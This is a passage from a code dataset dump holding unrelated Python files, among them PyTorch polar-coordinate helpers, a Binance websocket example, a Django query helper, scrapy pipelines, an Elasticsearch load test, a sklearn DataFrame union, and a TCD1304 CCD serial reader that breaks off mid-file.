% (removed))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n","sub_path":"other/video_to_slides.py","file_name":"video_to_slides.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"1825341","text":"import torch\n\n\ndef convert_polar_to_cylindrical(x1, x2=None):\n '''\n converts the polar representation (i.e. magnitude and phase) of the complex tensor x1 ( or tensors x1 and x2)\n to cylindrical representation (i.e. real and imaginary)\n :param:\n x1: is a tensor contains both magnitude and phase channels in the last dims if x2=None;\n or contains only magnitude part if x2 contains phase component.\n x2: is a tensor similar to x2 or None\n '''\n\n if x2 is None: # x1 contains both magnitude and phase components\n ndims = x1.ndimension()\n mag_input = x1.narrow(ndims - 1, 0, 1).squeeze(ndims - 1)\n phase_input = x1.narrow(ndims - 1, 1, 1).squeeze(ndims - 1)\n\n real = mag_input * torch.cos(phase_input)\n imag = mag_input * torch.sin(phase_input)\n return torch.stack((real, imag), dim=x1.ndimension() - 1)\n\n else: # x1 contains magnitude component and x2 contains phase component\n real = x1 * torch.cos(x2)\n imag = x1 * torch.sin(x2)\n return real, imag\n\n\ndef convert_cylindrical_to_polar(x1, x2=None):\n '''\n converts the cylindrical representation (i.e. real and imaginary) of the complex tensor x1 ( or tensors x1 and x2)\n to polar representation (i.e. magnitude and phase)\n :param:\n x1: is a tensor contains both real and imaginary channels in the last dims if x2=None;\n or contains only real part if x2 contains imaginary component.\n x2: is a tensor similar to x2 or None\n '''\n\n if x2 is None: # x1 contains both real and imaginary components\n ndims = x1.ndimension()\n real = x1.narrow(ndims - 1, 0, 1).squeeze(ndims - 1)\n imag = x1.narrow(ndims - 1, 1, 1).squeeze(ndims - 1)\n\n mag = (real ** 2 + imag ** 2) ** (0.5)\n phase = torch.atan2(imag, real)\n phase[phase.ne(phase)] = 0.0 # remove NANs\n\n return torch.stack((mag, phase), dim=x1.ndimension() - 1)\n\n else: # x1 contains real component and x2 contains imaginary component\n mag = (x1 ** 2 + x2 ** 2) ** (0.5)\n phase = torch.atan2(x2, x1)\n\n phase[phase.ne(phase)] = 0.0 # remove NANs\n return mag, phase\n","sub_path":"utils/polar_transforms.py","file_name":"polar_transforms.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"50066220","text":"#!/usr/bin/env python\n\nimport time\nimport logging\nfrom binance.lib.utils import config_logging\nfrom binance.websocket.spot.websocket_client import SpotWebsocketClient as Client\n\nconfig_logging(logging, logging.DEBUG)\n\n\ndef message_handler(message):\n logging.info(message)\n\n\nmy_client = Client()\nmy_client.start()\n\n\n# subscribe one stream\nmy_client.instant_subscribe(\n stream=\"bnbusdt@bookTicker\",\n callback=message_handler,\n)\n\ntime.sleep(3)\n\n# subscribe multiple streams\nmy_client.instant_subscribe(\n stream=[\"bnbusdt@bookTicker\", \"ethusdt@bookTicker\"],\n callback=message_handler,\n)\n\ntime.sleep(30)\n\nlogging.debug(\"closing ws connection\")\nmy_client.stop()\n","sub_path":"examples/websocket/spot/combined_streams.py","file_name":"combined_streams.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"516082756","text":"import os\nfrom functools import 
reduce\n\nclass Save_data:\n '''\n Save files\n \n Files are saved under the web directory, with one top-level directory per domain and subdirectories following the url path'''\n \n WEBS_PATH = os.path.join(os.getcwd(), 'web')\n @staticmethod\n def create_dir(dirname):\n '''\n Create a directory from the url path'''\n\n if os.path.isdir(dirname):\n return\n\n os.mkdir(dirname)\n\n @staticmethod\n def create_file(filename, data):\n '''\n Create a file from the url path'''\n\n try:\n with open(filename, 'wb') as f:\n f.write(data)\n except Exception as e:\n print('[Save_data] failed to save the file:')\n print(e)\n\n def __init__(self, CURRENT_URL, HOSTNAME, URL_PATH, data):\n self.CURRENT_URL = CURRENT_URL\n self.data = data\n # site root path\n self.ROOT_PATH = os.path.join(Save_data.WEBS_PATH, HOSTNAME)\n self.FILE_PATH = ''\n self.URL_PATH = URL_PATH\n\n def start(self): \n DIRNAME, BASENAME = os.path.split(self.URL_PATH)\n \n self.create_root()\n self.set_file_path(DIRNAME)\n # the hostname of the data's url becomes the web root directory\n Save_data.create_dir(self.ROOT_PATH)\n Save_data.create_file(os.path.join(self.ROOT_PATH, self.FILE_PATH, BASENAME), self.data)\n\n def create_root(self):\n '''\n Create the web directory and the site directory'''\n\n if not os.path.isdir(Save_data.WEBS_PATH):\n os.mkdir(Save_data.WEBS_PATH)\n\n if not os.path.isdir(self.ROOT_PATH):\n os.mkdir(self.ROOT_PATH)\n\n def set_file_path(self, dirname):\n def dir_reduce(dirname_total, dirname):\n dirname_total = os.path.join(dirname_total, dirname)\n\n Save_data.create_dir(os.path.join(self.ROOT_PATH, dirname_total))\n\n return dirname_total\n\n # array of the file's path segments [dir1, dir2, ...]\n dir_arr = list(filter(lambda item: bool(item) , str.split(dirname, '/')))\n\n self.FILE_PATH = reduce(dir_reduce, dir_arr, '')\n ","sub_path":"Save_data.py","file_name":"Save_data.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"258015977","text":"from diagnose_app.models import *\n\nclass query_table:\n\t\"\"\"\n\t This class is used to query a table based on the given conditions\n\t\"\"\"\n\tdef __init__(self,tableName,startDay,startTime,endDay,endTime,counterList):\n\t\tself.__tableName__ = tableName\n\t\tself.__startDay__ = startDay\n\t\tself.__startTime__ = startTime\n\t\tself.__endDay__ = endDay\n\t\tself.__endTime__ = endTime\n\t\tself.__counterList__ = counterList\n\t\tself.__querylist__ = [] \n\t\tself.returnQueryList = []\n\n\tdef query(self):\n\t\t\"\"\"\n\t\tThis function queries all records between 'startDay startTime' and 'endDay 
endTime'\t\t\t\n\t\t\"\"\"\n\t\tif self.__startDay__ == self.__endDay__ and self.__startTime__ == self.__endTime__:\n\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__exact=self.__startDay__).filter(Time__exact=self.__startTime__)\"))\n\t\telse:\n\t\t\tif self.__startDay__ == self.__endDay__ :\n\t\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__exact=self.__startDay__).filter(Time__gte=self.__startTime__).filter(Time__lte=self.__endTime__)\"))\n\t\t\telse:\n\t\t\t\t# interior days in full, then the partial start and end days (gt/lt keep the boundary days from being counted twice)\n\t\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__gt=self.__startDay__).filter(Day__lt=self.__endDay__)\"))\n\t\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__exact=self.__startDay__).filter(Time__gte=self.__startTime__)\"))\n\t\t\t\tself.__querylist__.extend(eval(self.__tableName__+\".objects.filter(Day__exact=self.__endDay__).filter(Time__lte=self.__endTime__)\"))\n\t\t\n\tdef query_list(self):\n\t\t\"\"\"\n\t\tThis function stores the related info in returnQueryList, which is laid out as below:\n\t\tif counterList = [counter1,counter2,counter3]\n\t\tthe returnQueryList =\n\t\t[\n\t\t\t[timeStamp1, counter1value,counter2value,counter3value],\n\t\t \t......\n\t\t]\n\t\t\"\"\"\n\t\tself.query()\n\t\tfor record in self.__querylist__:\n\t\t\ttemp_list = []\n\t\t\ttimeStamp = str(record.Day) + \" \" + str(record.Time)\n\t\t\ttemp_list.append(timeStamp)\n\t\t\tfor counter in self.__counterList__:\n\t\t\t\ttemp_list.append(eval(\"record.\"+counter))\n\t\t\tself.returnQueryList.append(temp_list)\n\t\t\t \n\t\treturn self.returnQueryList\n\n\t\n\n","sub_path":"diagnose/diagnose_app/query_table.py","file_name":"query_table.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"629839771","text":"#!/usr/bin/env python3\n#\n# Created by Samvel Khalatyan, Feb 07, 2012\n# Copyright 2011, All rights reserved\n\ndef squares(max):\n for i in range(max):\n yield i, i ** 2\n\nclass SquaresIterator:\n def __init__(self, max):\n self.i = 0\n self.max = max\n\n def __iter__(self):\n self.i = 0\n\n return self\n\n def __next__(self):\n if self.i < self.max:\n i = self.i\n self.i += 1\n return i, i ** 2\n else:\n raise StopIteration\n\nclass SquaresGenerator:\n def __init__(self, max):\n self.max = max\n\n def __call__(self):\n for i in range(self.max):\n yield i, i ** 2\n\nif \"__main__\" == __name__:\n for i, square in squares(5):\n print(\"{0:>2} {1}\".format(i, square))\n print()\n\n for i, square in SquaresIterator(5):\n print(\"{0:>2} {1}\".format(i, square))\n print()\n\n s = SquaresGenerator(5)\n for i, square in s():\n print(\"{0:>2} {1}\".format(i, square))\n","sub_path":"class/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"124241463","text":"# ==========================================================================\n#\n# Copyright NumFOCUS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0.txt\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the 
License for the specific language governing permissions and\n# limitations under the License.\n#\n# ==========================================================================*/\n\nimport itk\nfrom sys import argv, exit\n\nitk.auto_progress(2)\n\nif argv[1] == \"Ball\":\n print(\"Ball\")\n strel = itk.FlatStructuringElement[2].Ball(int(argv[2]))\nelif argv[1] == \"Box\":\n print(\"Box\")\n strel = itk.FlatStructuringElement[2].Box(int(argv[2]))\nelse:\n print(\"invalid argument: \" + argv[1])\n exit(1)\n","sub_path":"Modules/Filtering/MathematicalMorphology/wrapping/test/FlatStructuringElementTest.py","file_name":"FlatStructuringElementTest.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"289615492","text":"# -*- coding: utf-8 -*-\n\nfrom Bio import Phylo\nfrom Bio import ExPASy\nfrom Bio import SwissProt\n\n \nfile = open(\"best_score2.xml\") #open the file with the best blast results\nlines = file.readlines()\nfile.close() \nl=[]\n\nfor i in range(len(lines)): # the id comes right after \"sequence:sp|\"\n if \"sequence:sp\" in lines[i]:\n lines[i] = lines[i].split(\"|\")\n l.append(lines[i][1])\nd={} #store the information in a dictionary: species names are the keys and the sequences are the values\nfor i in l: \n try: #try to make sure the UniProt access went well\n handle = ExPASy.get_sprot_raw(i)\n record = SwissProt.read(handle)\n except Exception as e:\n print(i,e)\n if record.organism.upper() not in d.keys(): #for cases where the same organism appears more than once in the blast result,\n d[record.organism.upper()] = record.sequence #we keep only the first one;\n\nseqs_file = open(\"seqs2.fasta\",\"w\") #save the sequences to a fasta file\nfor key in d.keys():\n seqs_file.write(\">\" + key + \"\\n\" + d[key] + \"\\n\\n\")\n\nseqs_file.close()\n","sub_path":"eif2ak4_phylogeny.py","file_name":"eif2ak4_phylogeny.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"653824536","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#############################################################\n# #\n# Updating the elastic search index with fresh data. 
#\n# #\n#############################################################\n\n#============================================================\n#title :filling_index.py\n#description : Filling the elastic search index.\n#author :maha\n#date :2019-04-12\n#version :1.0\n#usage :python filling_index.py <inputfile.json>\n#notes :\n#python_version :3.7.0\n#============================================================\n\nimport os\nimport re\nimport sys\nimport json\nimport getopt\nimport requests\nimport pandas as pd\nfrom faker import Faker\nfrom faker.providers import BaseProvider,person\nfrom elasticsearch import Elasticsearch\n\nimport logging\nimport threading\nimport time\nimport random\n\nes_host = 'http://localhost'\nes_port = 9200\nes_index_name = 'customers'\n\nes = Elasticsearch([{'host': es_host, 'port': es_port}])\n\nfake = Faker()\n\ndf_all = pd.DataFrame(data = [], columns = ['Session','Elapsed','Status', 'ContentSize'])\n# the results frame is shared by all worker threads, so guard it with a lock\ndf_lock = threading.Lock()\n\ndef generate_fake_data(fake):\n \n indexRow = {\n \"first_name\": fake.first_name(),\n \"last_name\": fake.last_name(),\n \"address\":fake.street_address(),\n \"phone_number\":fake.phone_number(),\n \"email\":fake.email(),\n \"job\": fake.job(),\n \"company\":fake.company(),\n \"biography\":fake.paragraph(nb_sentences=5, variable_nb_sentences=True, ext_word_list=None)\n }\n\n return indexRow\n\ndef client_insert(fake,number_hits):\n\n global df_all\n \n results = []\n\n url = \"%s:%s/%s/_doc\" % ( es_host, es_port, es_index_name )\n session_name = fake.city()\n\n for i in range(0, number_hits):\n\n fake_data = json.dumps(generate_fake_data(fake))\n\n req = requests.post(url, data= fake_data, headers = {'content-type': 'application/json'})\n\n elapsed = (req.elapsed.microseconds/1000)\n status = req.status_code\n content_size = len( fake_data )\n\n row = [ session_name, elapsed, status, content_size ]\n\n results.append(row)\n \n df = pd.DataFrame(data = results, columns = ['Session','Elapsed','Status', 'ContentSize'])\n\n with df_lock:\n df_all = df_all.append(df, ignore_index=True)\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n threads = list()\n for index in range(50):\n logging.info(\"Main : create and start thread %d.\", index)\n x = threading.Thread(target=client_insert, args=(fake, int(random.uniform(1000000,2000000)) ))\n threads.append(x)\n x.start()\n\n # wait for every worker to finish before dumping the results\n for index, thread in enumerate(threads):\n logging.info(\"Main : before joining thread %d.\", index)\n thread.join()\n logging.info(\"Main : thread %d done\", index)\n\n df_all.to_csv('results_ldtests.csv', index = False)\n\n","sub_path":"load_test/load_test_append.py","file_name":"load_test_append.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"177287898","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# Pipeline 1 - print output\nclass MaoyanPipeline(object):\n def process_item(self, item, spider):\n print(item['name'], item['time'], item['star'])\n return item\n\n\n# Pipeline 2 - store in MySQL\nimport pymysql\nfrom .settings import *\n\n\nclass MaoyanMysqlPipeline(object):\n def open_spider(self, spider):\n self.db = pymysql.connect(MYSQL_HOST, MYSQL_USER, MYSQL_PWD, MYSQL_DB, charset=CHARSET)\n self.cursor = self.db.cursor()\n\n def process_item(self, item, spider):\n 
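# parameterized INSERT: pymysql fills the %s placeholders from film_li\n 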
ins = 'insert into maoyantab values(%s,%s,%s)'\n film_li = [item['name'], item['star'], item['time']]\n self.cursor.execute(ins, film_li)\n self.db.commit()\n\n return item\n\n def close_spider(self, spider):\n self.cursor.close()\n self.db.close()\n\n\n# Pipeline 3 - store in MongoDB\nimport pymongo\n\n\nclass MaoyanMongoPipeline(object):\n def open_spider(self, spider):\n self.conn = pymongo.MongoClient(MONGO_HOST, MONGO_PORT)\n self.db = self.conn[MONGO_DB]\n self.myset = self.db[MONGO_SET]\n\n def process_item(self, item, spider):\n film_dict = {\n 'name': item['name'],\n 'star': item['star'],\n 'time': item['time'],\n }\n self.myset.insert_one(film_dict)\n return item\n","sub_path":"4. Python 爬虫工程师/1. Web Scraping/day08/day08_code/Maoyan/Maoyan/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"199953518","text":"'''\nThis is similar to the coin-change problem.\n12 can be written as 9+1+1+1, but 4+4+4 uses fewer squares.\nSo every combination has to be considered.\nLet dp[n] be the minimum number of squares summing to n; then\ndp[1] = 1 => 1\ndp[2] = 1+1 => 2\ndp[3] = 1+1+1 => 3\ndp[4] = 4 => 1\ndp[5] = min(dp[4]+1,dp[1]+1)\ndp[12] = min(dp[12-1]+1,dp[12-4]+1,dp[12-9]+1)\n'''\nimport math\n\nN = int(input())\nnums = []\nfor i in range(1,int(math.sqrt(N))+1):\n if i**2 <= N:\n nums.append(i**2)\n\ndp = [0]*(N+1)\ndp[1] = 1\n\nfor i in range(2,N+1):\n result = 100000\n for num in nums:\n if i >= num:\n k=dp[i-num]+1\n if result > k:\n result = k\n dp[i] = result\n\nprint(dp[N])\n","sub_path":"백준/Python/카테고리/다이나믹 프로그래밍/1699(제곱수의 합).py","file_name":"1699(제곱수의 합).py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"531197052","text":"import pytest\nfrom setting import Setting\nfrom modules.BlockBase import BlockBase\nfrom modules.block_alarm import BlockAlarm\n\nSECTION_NAME = \"AlarmBlock\"\n\n\n@pytest.mark.block_alarm\ndef test_block_alarm(logger):\n config = Setting()\n with pytest.raises(TypeError):\n BlockAlarm(None, None)\n with pytest.raises(TypeError):\n BlockAlarm(None, config)\n with pytest.raises(TypeError):\n BlockAlarm(logger, None)\n block = BlockAlarm(logger, config)\n assert block is not None\n assert isinstance(block, BlockBase)\n with pytest.raises(KeyError):\n block.init({})\n\n\n@pytest.mark.block_alarm\ndef test_init(logger):\n config = _get_setting(None)\n block = BlockAlarm(logger, config)\n assert block is not None\n block.init({})\n assert block._blocks is not None\n assert block._alarm_block is not None\n assert block._functions is not None\n\n\ndef _get_setting(name):\n params = {\n \"BlockList\": \"Time\",\n \"List\": \"\",\n }\n config = Setting()\n config.configuration.add_section(SECTION_NAME)\n if name == \"\":\n return config\n section = config.configuration[SECTION_NAME]\n for key, value in params.items():\n section[key] = value.__str__()\n if key == name:\n break\n return config\n","sub_path":"test/xxxx_block_alarm.py","file_name":"xxxx_block_alarm.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"44683708","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\n\nchatbot = ChatBot(\"Ron Obvious\")\n\nconversation = [\n \"Hello\",\n \"Hi there!\",\n \"How are you doing?\",\n \"I'm doing fuck.\",\n \"That is good to hear\",\n \"Thank you.\",\n \"You're welcome.\"\n]\n\"\"\"\ncount = 0\nwhile count < 100:\n 
chatbot.set_trainer(ListTrainer)\n chatbot.train(conversation)\n count += 1\n\"\"\"\nresponse = chatbot.get_response(\"How do you do\")\nprint(response)\n","sub_path":"quick_start.py","file_name":"quick_start.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"481671155","text":"\r\nstring=\"Thisisastring\"\r\n \r\nfor i in range(0,len(string)):\r\n flag=0\r\n for j in range(0,len(string)):\r\n #checking if two charactors are equal\r\n if(string[i]==string[j] and i!=j):\r\n flag=1\r\n break\r\n if(flag==0):\r\n print(string[i],end=\"\")","sub_path":"distint.py","file_name":"distint.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"538841896","text":"import numpy as np\nimport pandas as pd\nfrom joblib import Parallel, delayed\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import FeatureUnion, _fit_transform_one, _transform_one\n\n\nclass DFFeatureUnion(FeatureUnion):\n \"\"\"[EXPERIMENTAL] Wrapper class for FeatureUnion to return Pandas DataFrame \n instead of scipy sparse matrix.\n\n Parameters:\n transformer_list : list of (string, transformer) tuples\n List of transformer objects to be applied to the data.\n\n n_jobs : int, default=None\n Number of jobs to run in parallel.\n\n transformer_weights : dict, default=None\n Multiplicative weights for features per transformer.\n\n verbose : bool, default=False\n If True, the time elapsed while fitting each transformer will be\n printed as it is completed.\n\n Example:\n union = DFFeatureUnion([\n ('num', num_pipe),\n ('cat', cat_pipe),\n ('buc', buc_pipe)\n ])\n \"\"\"\n\n def fit_transform(self, X, y=None, **fit_params):\n self._validate_transformers()\n result = Parallel(n_jobs=self.n_jobs)(\n delayed(_fit_transform_one)(\n transformer=trans,\n X=X,\n y=y,\n weight=weight,\n **fit_params)\n for name, trans, weight in self._iter())\n if not result:\n # All transformers are None\n return np.zeros((X.shape[0], 0))\n Xs, transformers = zip(*result)\n self._update_transformer_list(transformers)\n Xs = self.merge_dataframes_by_column(Xs)\n # get all fitted columns\n self.fitted_columns = Xs.columns\n\n return Xs\n\n def merge_dataframes_by_column(self, Xs):\n return pd.concat(Xs, axis=\"columns\", copy=False)\n\n def transform(self, X):\n X = X.copy()\n Xs = Parallel(n_jobs=self.n_jobs)(\n delayed(_transform_one)(\n transformer=trans,\n X=X,\n y=None,\n weight=weight)\n for name, trans, weight in self._iter())\n if not Xs:\n # All transformers are None\n return np.zeros((X.shape[0], 0))\n X_ = self.merge_dataframes_by_column(Xs)\n # Create data for missing columns\n missing_vars = [\n var for var in self.fitted_columns if var not in X_.columns]\n if len(missing_vars) != 0:\n for var in missing_vars:\n X_[var] = 0\n # Matching transformed column and fitted columns\n X_ = X_[self.fitted_columns].copy()\n return X_\n\n\nclass DFColumnsSelector(BaseEstimator, TransformerMixin):\n\n def __init__(self, columns, dtype=None):\n \"\"\"Select columns from DataFrame.\n\n Args:\n columns (str or list): A list or string of column names.\n dtype (type, optional): Select by data type. 
Defaults to None.\n \"\"\"\n if not isinstance(columns, list):\n self.columns = [columns]\n else:\n self.columns = columns\n self.dtype = dtype\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X):\n if self.dtype:\n return X[self.columns].astype(self.dtype)\n else:\n return X[self.columns]\n\n\nclass DataFrameUnion(TransformerMixin, BaseEstimator):\n \"\"\"\n In: list of (string, transformer) tuples :\n Out: pd.DataFrame\n \"\"\"\n\n def __init__(self, transformer_list):\n self.feature_names = None\n # (string, Transformer)-tuple list\n self.transformer_list = transformer_list\n\n def __getitem__(self, attrib):\n return self.__dict__[attrib]\n\n def transform(self, X):\n \"\"\"Transform X separately by each transformer, concatenate results.\n Parameters\n ----------\n X : array-like or sparse matrix, shape (n_samples, n_features)\n Input data to be transformed.\n Returns\n -------\n X_t : array-like or sparse matrix, shape (n_samples, sum_n_components)\n hstack of results of transformers. sum_n_components is the\n sum of n_components (output dimension) over transformers.\n \"\"\"\n Xs = (self._transform_one(trans, X)\n for name, trans in self.transformer_list)\n df_merged_result = self._merge_results(Xs)\n return df_merged_result\n\n def fit(self, X, y=None):\n \"\"\"Fit all transformers using X.\n Parameters\n ----------\n :param X: pd.DataFrame\n Input data, used to fit transformers.\n :param y:\n \"\"\"\n transformers = (self._fit_one_transformer(trans, X, y)\n for name, trans in self.transformer_list)\n self._update_transformer_list(transformers)\n return self\n\n def _merge_results(self, transformed_result_generator):\n df_merged_result = ''\n for transformed in transformed_result_generator:\n if isinstance(transformed, pd.Series):\n transformed = pd.DataFrame(data=transformed)\n if not isinstance(df_merged_result, pd.DataFrame):\n df_merged_result = transformed\n else:\n df_merged_result = pd.concat(\n [df_merged_result, transformed], axis=1)\n\n if self.feature_names is None:\n self.feature_names = df_merged_result.columns\n elif (len(self.feature_names) != len(df_merged_result.columns)) or \\\n ((self.feature_names != df_merged_result.columns).any()):\n custom_dataframe = pd.DataFrame(\n data=0, columns=self.feature_names, index=df_merged_result.index)\n custom_dataframe.update(df_merged_result)\n df_merged_result = custom_dataframe\n return df_merged_result\n\n def _update_transformer_list(self, transformers):\n self.transformer_list[:] = [\n (name, new)\n for ((name, old), new) in zip(self.transformer_list, transformers)\n ]\n\n def _fit_one_transformer(self, transformer, X, y):\n return transformer.fit(X, y)\n\n def _transform_one(self, transformer, X):\n return transformer.transform(X)\n","sub_path":"skpdspipe/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":6229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"148165962","text":"import queue\nimport threading\nimport time\nimport traceback\nimport serial\nfrom serial.tools import list_ports\nimport numpy as np\n\n\nclass TCD1304(threading.Thread):\n\t\"\"\" A thread for monitoring a COM port. The COM port is\n\t\topened when the thread is started.\n\n\t\tdata_q:\n\t\t\tQueue for received data. 
Items in the queue are\n\t\t\t(data, timestamp) pairs, where data is a binary\n\t\t\tstring representing the received data, and timestamp\n\t\t\tis the time elapsed from the thread's start (in\n\t\t\tseconds).\n\n\t\terror_q:\n\t\t\tQueue for error messages. In particular, if the\n\t\t\tserial port fails to open for some reason, an error\n\t\t\tis placed into this queue.\n\n\t\tport:\n\t\t\tThe COM port to open. Must be recognized by the\n\t\t\tsystem.\n\n\t\tport_baud/stopbits/parity:\n\t\t\tSerial communication parameters\n\n\t\tport_timeout:\n\t\t\tThe timeout used for reading the COM port. If this\n\t\t\tvalue is low, the thread will return data in finer\n\t\t\tgrained chunks, with more accurate timestamps, but\n\t\t\tit will also consume more CPU.\n\t\"\"\"\n\n\tdata_q = queue.Queue()\n\terror_q = queue.Queue()\n\n\thighSpeedMode = False\n\tintegration = 1\n\ttrigger = False\n\tbuf_sign = 0\n\tloop_sign = 1\n\tlastTime = time.time()\n\tdef __init__(self, highSpeedMode=False, trigger=False, integration=1):\n\t\tthreading.Thread.__init__(self)\n\n\t\tself.highSpeedMode = highSpeedMode\n\t\tself.integration = integration\n\t\tself.trigger = trigger\n\t\tself.serial_port = None\n\t\tself.lock = threading.Lock()\n\t\tself.alive = threading.Event()\n\t\tself.alive.set()\n\t\t#self.lock.acquire()\n\n\tdef run(self):\n\t\ttry:\n\t\t\tif self.serial_port:\n\t\t\t\tself.serial_port.close()\n\t\t\telse:\n\t\t\t\tports = list(list_ports.grep(\"0403:6001\"))\n\t\t\t\tself.port = '/dev/ttyUSB0'\n\t\t\t\tfor i in ports:\n\t\t\t\t\tif i.description == 'TIT 2RCRP':\n\t\t\t\t\t\tself.port = i.device\n\t\t\t\tself.serial_port = serial.Serial(self.port,baudrate=115200,timeout=0.1)#, bytesize=serial.EIGHTBITS,parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE,rtscts=False,dsrdtr=False)\n\t\t\t\tself.setTrigger(self.trigger)\n\t\t\t\tself.setIntegration(self.integration)\n\t\t\t\tself.setHighSpeedMode(self.highSpeedMode)\n\n\t\texcept serial.SerialException:\n\t\t\tself.error_q.put(traceback.print_exc())\n\n\t\t\treturn self.error_q\n\n\t\t# Record the start time; time.clock() was removed in Python 3.8, so use perf_counter()\n\t\tstart_time = time.perf_counter()\n\t\ttime.sleep(0.1)\n\t\tdata = b''\n\t\twhile self.alive.is_set():\n\t\t\t# Reading 1 byte, followed by whatever is left in the\n\t\t\t# read buffer, as suggested by the developer of\n\t\t\t# PySerial.\n\t\t\t#\n\n\t\t\ttry:\n\n\t\t\t\tdata = self.getData()\n\t\t\t\ttimestamp = time.perf_counter() - start_time\t# seconds elapsed since the thread started\n\t\t\t\tself.data_q.put((data, timestamp))\n\t\t\t\ttime.sleep(0.05)\n\t\t\t\t#print(data.sum(),self.error_q.get())\n\n\t\t\texcept (serial.SerialException, OSError) as e:\n\t\t\t\tself.error_q.put(e)\n\t\t\t\tself.stop()\n\n\t\t\t\treturn\n\t\t\t#time.sleep(0.05)\n\t\t# clean up\n\t\tif self.serial_port:\n\t\t\tself.serial_port.close()\n\t\tprint('CCD Stopped')\n\n\tdef setHighSpeedMode(self, active=False):\n\t\tif active:\n\t\t\tself.serial_port.write(b'#CSDTP:0%'+bytearray([0x11,0x13]))\n\t\t\tself.serial_port.write(b'#?data%'+bytearray([0x11,0x13]))\n\t\t\t#for i in range(10):\n\t\t\tself.serial_port.write(b'#CSDTP:1%'+bytearray([0x11,0x13]))\n\t\t\ttime.sleep(1)\n\t\telse:\n\t\t\tpass#self.serial_port.write(b'#CSDTP:0%'+bytearray([0x11,0x13]))\n\n\tdef setTrigger(self, active=False):\n\t\tn = self.serial_port.inWaiting()\n\t\tif n != 0:\n\t\t\tr=self.serial_port.read(n)\t\n\t\t\tprint('#Text:',r)\n\t\tif not active:\n\t\t\t\tself.serial_port.write(b'#Text:0%'+bytearray([0x11,0x13]))\n\t\telif active:\n\t\t\t#for i in 
range(10):\n\t\t\tself.serial_port.write(b'#Text:1%'+bytearray([0x11,0x13]))\n\t\t\t#self.serial_port.write(b'#Text:1%'+bytearray([0x11,0x13]))\n\n\tdef setIntegration(self, level=1):\n\t\tlevel_str = \"#CCDInt:\";\n\n\t\tif level<=0 or level>100:\n\t\t\t\tlevel = 1\n\t\tstr1 = ''\n\t\tif level<10:\n\t\t\t\tstr1=\"00\"+str(level)\n\t\telif level>=10 and level<100:\n\t\t\t\tstr1=\"0\"+str(level)\n\t\telif level==100:\n\t\t\t\tstr1=str(level)\n\t\tlevel_str=level_str+str1+\"%\";\n\t\tn = self.serial_port.inWaiting()\n\t\tif n != 0:\n\t\t\tr=self.serial_port.read(n)\t\t\n\t\t\tprint('#CCDInt:',r)\n\t\tself.serial_port.write(level_str.encode()+bytearray([0x11,0x13]))\n\t\t#self.serial_port.write(level_str.encode()+bytearray([0x11,0x13]))\n\n\tdef getData(self):\n\t\tccd_vol_array = np.zeros(3648,dtype=int)\n\t\tif not self.highSpeedMode:\n\t\t\tself.serial_port.write(b'#?data%'+bytearray([0x11,0x13]))\n\t\t\tread_buf = self.serial_port.read(1)#7296)\n\t\t\tl = 1\n\t\t\tfor i in 